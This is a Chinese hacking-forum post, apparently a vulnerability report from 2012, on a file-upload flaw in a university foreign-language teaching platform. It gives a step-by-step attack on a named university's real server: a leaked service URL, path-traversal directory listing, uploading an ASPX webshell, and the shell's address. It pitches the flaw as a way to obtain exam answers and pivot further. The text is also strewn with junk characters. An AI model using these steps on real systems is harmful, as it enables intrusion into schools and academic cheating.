找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2025|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中# P; o3 c2 t% _6 H- T* O

( x/ S, D: p  l详细说明:  y- p1 @0 f+ m) g% o! }, f

3 D$ x' b  F4 H- P7 w( n以南开大学的为例:
; E( Q, ]* q2 ~http://222.30.60.3/NPELS
: s- A& _0 c/ R! u$ e4 |- }NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址( q% ]* K2 X, C- h$ z
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
2 N1 \0 E- ?, o% C<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
# O3 }0 r5 n* e% i# v+ `</setting>/ O8 i- l' C2 `$ U. t4 x
及版本号
# {1 _- A2 V& W6 N! m# f! ~: L<add key="TVersion" value="1, 0, 0, 2187">: l7 I0 c" d" ?2 q' ?) v" \
</add>
0 n1 V) d$ \+ J* I3 F; K) I- i, g直接访问, N- [" a; x4 w8 w
http://222.30.60.3/NPELS/CommonService.asmx+ C) g( E4 M: ^! [, |, D
使用GetTestClientFileList操作,直接 HTTP GET 列目录:' _" ~) h6 o+ N; {3 T4 u0 @
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
: c% l* ?( A4 B" c& L3 I7 [7 p; h进一步列目录(返回的网页很大,可以直接 wget 下来)
7 i- {& M3 |( d, [7 vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../4 x6 B) G9 @  M$ h
5 D  H( w8 r% b$ W6 _8 a, ^# Z
发现
$ x2 W- W  ?& @1 O& {" Xhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
: F7 Y& [* q' X0 y3 F9 f; }9 i9 u可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头* l- y  c! {2 \2 O
上传后继续列目录找到木马地址直接访问即可1 x0 |3 U9 i+ D

+ f$ p5 B0 `5 `/ N, o! B% _4 vOOXX
2 i+ x3 X7 D) F% E- T$ l' I ! [5 V5 a( t! G
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
6 H; C: [" }; V0 P漏洞证明:
9 s! o& q) J+ x( K4 z4 _# i
& X; _4 V# O! U% j. G列目录:
. S3 v$ L8 w0 Ihttp://222.30.60.3/NPELS/CommonS ... List?version=../../
% V+ S0 [) n# P) `文件上传:
4 K! q& m8 c9 X" B3 d  }! Nhttp://222.30.60.3/npelsv/editor/editor.htm' ?8 B' z: ?- p: O# ^" a

- K3 F+ I" T/ e) X' C+ V: H$ s7 t上传木马:2 i# B9 ^* Y. I# D
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
! o) W+ J, b- `+ I+ } - u2 ]2 ?# T, |0 G  K, d: L5 C
修复方案:/ L+ w: f3 s! l+ a, D- Q. D
好像考试系统必须使用 CommonService.asmx
4 G6 H6 S& v: J: o最好配置文件加密或者用别的方式不让它泄露出来  J/ s; t( H/ z, ~" z7 i6 i
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
# T9 T8 T: Y: F; B% d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表